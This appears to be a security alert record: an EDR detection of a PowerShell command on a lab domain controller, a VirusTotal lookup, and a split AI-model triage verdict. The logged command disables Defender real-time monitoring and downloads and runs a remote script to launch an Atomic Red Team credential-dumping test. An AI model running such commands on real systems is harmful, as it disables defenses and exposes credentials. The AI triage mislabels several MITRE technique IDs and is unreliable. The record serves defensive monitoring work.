{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "690bbfa7-9a41-4a6b-9f14-a19d69c2a850",
  "gen_time": 1774364752117,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364752000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.825,
  "false_positive_reason": null,
  "investigation_questions": [
    "What user account was used to execute this process?",
    "Are there any other processes spawned from this PowerShell instance?",
    "Has the host been connected to external networks recently?",
    "Were there any failed login attempts prior to this event?"
  ],
  "ioc_analysis": "The process is running PowerShell from its expected location but executing highly suspicious commands including disabling real-time monitoring (Set-MpPreference), using Invoke-Expression with IEX, and explicitly invoking Atomic Red Team tests. The command line shows clear intent to bypass security controls and test for T1003.004 (Lateral Movement).",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Set-ExecutionPolicy Unrestricted",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Install-AtomicRedTeam -Force -getAtomics",
    "Invoke-AtomicTest T1003.004 -CheckPrereqs"
  ],
  "mitre_techniques": [
    "T1562.001 (Disable Antivirus)",
    "T1059.001 (PowerShell)",
    "T1078 (Remote Services)",
    "T1562.003 (Disable Real-Time Monitoring)"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to redcanaryco domains and GitHub raw.githubusercontent.com",
    "Review all PowerShell execution policies on the system",
    "Check for persistence mechanisms in startup folders or registry",
    "Analyze network connections for C2 communication"
  ],
  "risk_score": 82,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious activity where an attacker is disabling real-time monitoring and deploying the Atomic Red Team framework to test for lateral movement capabilities.\n\n**IOC Analysis:** The process is running PowerShell from its expected location but executing highly suspicious commands including disabling real-time monitoring (Set-MpPreference), using Invoke-Expression with IEX, and explicitly invoking Atomic Red Team tests. The command line shows clear intent to bypass security controls and test for T1003.004 (Lateral Movement).\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe PowerShell process from C:\\Windows\\System32\\ is legitimate and signed, but the command line attempts to disable real-time monitoring and download/install malicious scripts, indicating suspicious activity.\n\n**IOC Analysis:** The file path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a known legitimate Windows binary. However, the command line includes commands to set execution policy, disable real-time monitoring, and download scripts from GitHub, which are suspicious indicators of evasion and unauthorized system changes. The hash is signed, but the behavior suggests potential malicious intent.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}